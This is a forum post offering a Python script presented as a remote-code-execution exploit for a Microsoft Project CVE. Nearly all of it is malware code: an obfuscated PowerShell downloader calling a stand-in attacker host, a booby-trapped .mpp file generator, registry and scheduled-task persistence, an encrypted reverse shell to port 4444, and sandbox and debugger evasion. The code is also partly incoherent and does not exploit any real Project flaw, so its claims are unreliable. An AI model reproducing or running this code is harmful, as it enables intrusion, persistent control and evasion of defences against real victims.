Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
673CVE-2024-38189 RCE Microsoft Project.
STAFF TEAM
#1
https://cve.mitre.org/cgi-bin/cvename.cg...2024-38189

Here is a python script for this CVE
Quote:pip install pycryptodome
 
Quote:python3 exploit_script.py
 
Code:
import os
import base64
import platform
import random
import string
import subprocess
import ctypes
import sys
import socket
import struct
import time
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad

# Global Configuration
KEY = b'secretkey1234567'  # 16-byte key for AES encryption
IV = os.urandom(16)  # Random Initialization Vector for AES

def advanced_obfuscate_payload(payload):
    """Obfuscate payload using multiple techniques including AES encryption."""
    # Step 1: XOR with key
    xor_key = 'key123'
    xor_payload = ''.join(chr(ord(c) ^ ord(xor_key[i % len(xor_key)])) for i, c in enumerate(payload))
  
    # Step 2: AES encryption
    cipher = AES.new(KEY, AES.MODE_CBC, IV)
    encrypted_payload = cipher.encrypt(pad(xor_payload.encode('utf-8'), AES.block_size))
  
    # Step 3: Reversing and Base64 encoding
    reversed_payload = encrypted_payload[::-1]
    final_payload = base64.b64encode(reversed_payload).decode('utf-8')
    return final_payload

def generate_metamorphic_payload():
    """Generate a metamorphic payload that changes both structure and content."""
    base_payload = "powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden "
    metamorphic_parts = [
        "Invoke-WebRequest -Uri http://attacker_ip/malicious.exe",
        "Start-Process C:\\Windows\\Temp\\{}.exe".format(random_string(8)),
        "Start-Sleep -s {}".format(random.randint(1, 5))
    ]
    random.shuffle(metamorphic_parts)
    return base_payload + "; ".join(metamorphic_parts)

def execute_in_memory_advanced():
    """Execute payload directly in memory using advanced techniques."""
    payload = generate_metamorphic_payload()
    obfuscated_payload = advanced_obfuscate_payload(payload)
    exec_cmd = f"powershell -enc {obfuscated_payload}"
    subprocess.run(exec_cmd, shell=True)

def create_stealth_malicious_project_file(filename):
    """Create a more stealthy malicious Project file with advanced obfuscated payload."""
    try:
        with open(filename, 'wb') as f:
            f.write(b'MSPJ\x00\x00\x00\x01')  # Header
            f.write(os.urandom(300))  # Increased random padding
            f.write(os.urandom(100))  # Enhanced fuzzing

            payload = generate_metamorphic_payload()
            obfuscated_payload = advanced_obfuscate_payload(payload)
            script_tag = f"<script>exec(base64.b64decode('{obfuscated_payload}').decode('utf-8'))</script>"
            f.write(script_tag.encode('utf-8'))

            f.write(os.urandom(150))  # Additional random data
        print(f"Stealth Malicious Project file created: {filename}")
    except Exception as e:
        print(f"Failed to create malicious project file: {e}")

def add_stealth_persistence():
    """Add stealthier persistence with advanced methods."""
    try:
        if platform.system() == 'Windows':
            # Advanced persistence techniques
            persistence_cmds = [
                "schtasks /create /sc onlogon /tn 'System Maintenance' /tr 'C:\\path\\to\\malicious.exe' /ru SYSTEM",
                "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v 'Windows Defender' /t REG_SZ /d 'C:\\path\\to\\malicious.exe'",
                "powershell -Command \"Start-Process -FilePath 'C:\\Windows\\System32\\cmd.exe' -ArgumentList '/c start C:\\path\\to\\malicious.exe' -NoNewWindow\"",
                "powershell -Command \"New-Object -ComObject WScript.Shell\"",
                "reg add HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command /t REG_SZ /d 'C:\\path\\to\\malicious.exe'"
            ]
            for cmd in persistence_cmds:
                subprocess.run(cmd, shell=True, check=True)
        print("Stealth persistence added successfully.")
    except Exception as e:
        print(f"Failed to add stealth persistence: {e}")

def establish_secure_command_and_control():
    """Establish a secure and encrypted reverse shell to a remote C2 server."""
    try:
        host = 'attacker_ip'
        port = 4444
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
      
        while True:
            command = s.recv(1024)
            decrypted_command = decrypt_command(command)
            if decrypted_command.lower() == "exit":
                break
            output = subprocess.getoutput(decrypted_command)
            encrypted_output = encrypt_output(output)
            s.send(encrypted_output)
        s.close()
    except Exception as e:
        print(f"Failed to establish secure C2: {e}")

def decrypt_command(command):
    """Decrypt command from C2 server."""
    cipher = AES.new(KEY, AES.MODE_CBC, IV)
    decrypted_command = unpad(cipher.decrypt(command), AES.block_size).decode('utf-8')
    return decrypted_command

def encrypt_output(output):
    """Encrypt output before sending to C2 server."""
    cipher = AES.new(KEY, AES.MODE_CBC, IV)
    encrypted_output = cipher.encrypt(pad(output.encode('utf-8'), AES.block_size))
    return encrypted_output

def is_admin():
    """Check if the script is running with administrative privileges."""
    try:
        return ctypes.windll.shell32.IsUserAnAdmin() != 0
    except AttributeError:
        return False

def random_string(length):
    """Generate a random string of given length."""
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

# Environmental detection to evade sandbox
def detect_virtualization_advanced():
    """Advanced check for virtualization and sandbox environments."""
    known_virtual_envs = ['VBOX', 'VMware', 'VirtualBox', 'Xen', 'QEMU', 'Hyper-V']
    try:
        output = subprocess.check_output("wmic baseboard get product,manufacturer", shell=True).decode()
        for env in known_virtual_envs:
            if env in output:
                print("Virtual environment detected. Exiting.")
                sys.exit(0)
        if is_debugger_present():
            print("Debugger detected. Exiting.")
            sys.exit(0)
    except Exception as e:
        print(f"Failed to detect virtualization or debugging: {e}")

def is_debugger_present():
    """Check if the script is being run under a debugger."""
    return any(['OllyDbg' in process for process in os.popen('tasklist').read().strip().split('\n')])

# Main execution flow
detect_virtualization_advanced()
create_stealth_malicious_project_file("exploit.mpp")
add_stealth_persistence()
establish_secure_command_and_control()

Reply to this thread